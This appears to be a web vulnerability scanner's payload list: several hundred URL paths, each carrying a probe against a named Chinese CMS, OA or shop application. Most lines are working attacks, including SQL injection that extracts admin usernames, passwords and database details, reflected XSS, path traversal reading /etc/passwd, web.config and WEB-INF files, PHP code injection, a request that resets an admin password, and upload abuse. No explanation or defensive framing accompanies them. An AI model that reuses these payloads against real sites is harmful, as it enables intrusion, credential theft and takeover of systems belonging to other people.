/phpsso_server/api.php?op=install&username=phpcms&password=reer&url=123&name=123&authkey=123&apifilename=123&charset=123&type=123&synlogin=123
/u.php/member-login?id=header_login%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%2842873%29%3C/ScRiPt%3E&style=1
/index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request=
/misc.php?mod=syscode&pnumber=C%27%20or%20%60%27%60%20%20or%20@%60%27%27%60%20union%20select%201%20from%20%28select%20count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20%23%20@%60%27%60
/general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E
/jcms/m_5_1/attach_dwn.jsp?filename=passwd&fpath=/etc/passwd
/member.php?act=login&op=forget&rand=U7183
/mobile/goods_list.php?type=1s'%20onmouseover=alert(/ed1e83f8d8d90aa943e4add2ce6a4cbf/)%20//
/bocadmin/j/uploadify.php
/index.php?app=main&func=common&action=upFile&act=upforhtmleditor
/lib/upload/upload.php
/jcms/setup/publishadmin.jsp
/jcms/workflow/sys/que_dictionary.jsp?que_keywords=1'%20and%20'1'='1%20
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/index.php?app=user&ac=../../../robots.txt%00
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=2&class_id_1=8&pconsume=&orderby=person_consume&sort=,(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/index.php?app=/../robots.txt%00
/utility/convert/index.php
/utility/convert/data/config.inc.php
/install/svinfo.php
/posthistory.php?tel=IiBhbmQoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KChzZWxlY3QgKHNlbGVjdCAoU0VMRUNUIENIQVIoMTAwLCA1NiwgMTAwLCA1NywgNDgsIDk3LCA5NywgNTcsIDUyLCA1MSwgMTAxLCA1MiwgOTcsIDEwMCwgMTAwLCA1MCkpKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgbGltaXQgMCwxKSxmbG9vcihyYW5kKDApKjIpKXggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYSkj
/wap/index.php?mod=login&action=login
/wap/index.php?keywords='and((select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20CHAR(100,%2056,%20100,%2057,%2048,%2097,%2097,%2057,%2052,%2051,%20101,%2052,%2097,%20100,%20100,%2050)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a))and'&mod=search&page=2
/cart.php
/api.php?act=set_shopex_conf&api_version=5.0
/report/reportServlet?action=4&url=http://127.0.0.1&file=wait_trace.raq&columns=0&srcType=file&width=-1&height=-1&cachedId=A_2&t_i_m_e=&frame=stu_saveAs_frame--%3E%3C/sCrIpT%3E%3CsCrIpT%3Ealert(42873)%3C/sCrIpT%3E
/user.php?act=signin
/CompHonorBig.asp?id=44%20and%201=12%20%20union%20select%201,'webscan',3,4,5%20from%20admin
/admin_aspcms/_content/_Comments/AspCms_TabAdd.asp
/Aboutus.asp?Title=cfreer'%20and%201=2%20union%20select%2055221122%20from%20admin
/ProductShow.asp?ID=98%20and%201=1%20union%20select%201,'webscan',3,4,5,55221122,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin
/DownloadShow.asp
/NewsClass.asp
/plug/collect/AspCms_CollectFun.asp?action=getlinklist&todo=this&CollectID=1%20and%20%202=iif((1=1),2,chr(97))
/index.php?case=tag&act=show&tag=%2522%20union%20select%200x2D3120756E696F6E2073656C65637420312C307833313239323037353645363936463645323037333635364336353633373432303331324333323243333332433644363433353238333533353332333233313331333233323239324333353243333632433337324333383243333932433331333032433331333132433331333232433331333332433331333432433331333532433331333632433331333732433331333832433331333932433332333032433332333132433332333232433332333332433332333432433332333532433332333632433332333732433332333832433332333932433333333032433333333132433333333232433333333332433333333432433333333532433333333632433333333732433333333832433333333932433334333032433334333132433334333232433334333332433334333432433334333532433334333632433334333732433334333832433334333932433335333032433335333132433335333232433335333332433335333432433335333532433335333632433335333732433335333832303636373236463644323036333644373336353631373337393546373537333635373232332C332D2D,2%23
/Search.asp?GetType=MainInfo&SubSys=SD&Keyword=1&s_area=1%20union%20select%20df3342ecbf86e257()
/temp/compiled/pages.lbi.php/%22%3C/form%3E%3CsCripT%3Ealert(42873)%3C/scRipt%3E
/api.php?act=search_dly_type&api_version=1.0
/api/uc.php?code=e58bJh4lGn7%2F87F38CD3nphwoQNenQoOElYFu9%2FBvZV2gsgxPnmRmq3iJZcx%2FF1LPelzduVe3ZFJOD4Y0vpB388niaie8ECa%2FYA%2BqA13TPGzW5EpO%2FHaShEiHdaEqgyeRf%2Bh1EBCq3UASAPet%2BTI4R8tIKfU05ENmo5bK8Fj6DHvC9%2BtIksTeaOgmBzDwHdMbbLQwjGtvauIjUNnf2FglhdFD3mQdDiOq2rSSWxWPkQEYV0Z5ihe2YhVrmUlAVJqSshZ3wh5zdfjWzCUnP4I7k3f%2B2khp64tgUEbwIdcoV38Ei47PSd5h02j9uBvIs7yg%2ByfJ7zp5ArNiq3wuDcy9LtAXup68g
/?m=vote&id=&vid=1,3)%20and%20%20webscan1122%23
/aboutus.php?type=1'and%20(select%201%20from%20(select%20count(*),concat(md5(521122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/lostpass.php?md5=3&userid=-1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(55221122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/index.php?m=message&s=inquiry_basket
/index.php?m=message&s=inquire&userid=1)%20UnIon%20select%201,12,123%20from%20webscan%23
/index.php?m=announcement&s=admin/notice_manager&action=modify&id=1212%20UnIon%20select%201,2,concat(user,0x7c,password),4,5,6,7,8%20from%20webscan%23
/index.php?m=company&s=space_mail&tid=1)%20and%201=websec%20%23
/index.php?m=company&s=admin/exportexcel&ordrby=user%20and%201=websec%23
/index.php?m=news&s=admin/news&newsid=1%20and%20(SELECT%201%20from%20websec)
/notes.php?action=view&nid=1-websec
/?mod=account&code=Sendcheckmail&uname=-1%2527%20or%201=1%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?UNAME=reer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/Search.asp
/suggestwordList.php?searchWord=a&language=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select(select%20md5(1122)%20from%20nitc_user%20limit%200,1)),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)
/ProductBuy.asp?UpdateOrder=%E6%9B%B4%E6%96%B0%E9%80%89%E6%8B%A9
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/download.php?tfile=%5C..%5C..%5Cconfig.php
/plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
/api.php?act=search_sub_regions&api_version=1.0
/index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
/index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
/index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
/index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
/index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
/manage/WAP/Other/AddDalen.aspx?menu=add
/login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
/install/step4.aspx
/DataBase/%23zhi_rui_v_Base.mdb
/manage/Shop/profile/LmUserManage.aspx
/API/GetPageHtml.aspx
/stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
/manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
/msgChat/download.jsp?url=msgChat/download.jsp
/admin.php
/index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
/index/searchInfoTcontentByCategory.action
/emlib4/system/datasource/selectrecordset.aspx
//index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
/home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
/web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
/index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/AIP/upload.php?RUN_ID=1&T_ID=1
/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
/pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/index.php?m=company&s=admin/business_info_list
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/getpwd4.asp
/?m=offer&s=offer_list&id=1-webscan%23
/MemberLogin.asp
/views.asp
/basket.asp?h%77_id=513%20and%201=2
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/index.php?app=tag&ac=add&ts=do
/member/index.php?ugid31=51'%20and%20'1122'='12
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/search.php?mod=information&ids=1-webscan&catid=1
/box.php?
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/downLoadFile.action?filePath=/WEB-INF/web.xml
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/searchLines.aspx?LName=h%25';
/ProductBuy.Asp
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/searchLines.aspx?LName=h&t=webscan()'
/viewlist.aspx?typeid=webscan()'
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/gallery--p,0,1122%20and%200-0---1.html
/?m=info.detail&id=1-webscan
/misc.php?mod=getuserinfo&uid=-1
/?m=city.getSearch&index=reer
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/Product.asp
/user/getpassword.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/plus/ajax_user.php?act=check_email
/plus/ajax_user.php?act=check_usname
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/member.php?act=login&op=forget
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/wap/index.php
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/member/index.php
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/video.php
/news.php?classid=2
/ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/ajax.php?action=contentpage
/comments.php?id=3a&tablepre=boka_ckck
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/ajax.php?action=letter&letter=a
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=payment&s=admin/pickupmod
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
/mep-admin/DcServlet
/mep-admin/userAction!queryUser.action?start=0&limit=10
/admin/picupload.aspx
/manager/picupload.aspx
/microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
/TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/Ajax_Handle/UploadAttachmentHandler.ashx
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Ajax_Handle/UploadPictureHandler.ashx
/Ajax_Handle/UploadLocalVideoHandler.ashx
/index.php?m=api&a=userpreview
/index.php?m=Appmanager&a=loadapp
/CMSUploadFile.aspx
/api/shop.aspx
/sysinfo.jsp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/file/MyDownLoad.ashx?path=../web.config
/file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
/setup/setup1.jsp
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/file/EmailDownload.ashx?url=~/web.config&name=web.config
/file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
/file/DownLoad.ashx?path=~/Routes.config
/file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
/file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
/download.jsp?path=WEB-INF/&name=web.xml
/page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
/mx_form/order_save.php
/index.php?app=tag&ac=add&ts=do
/member.php?act=index
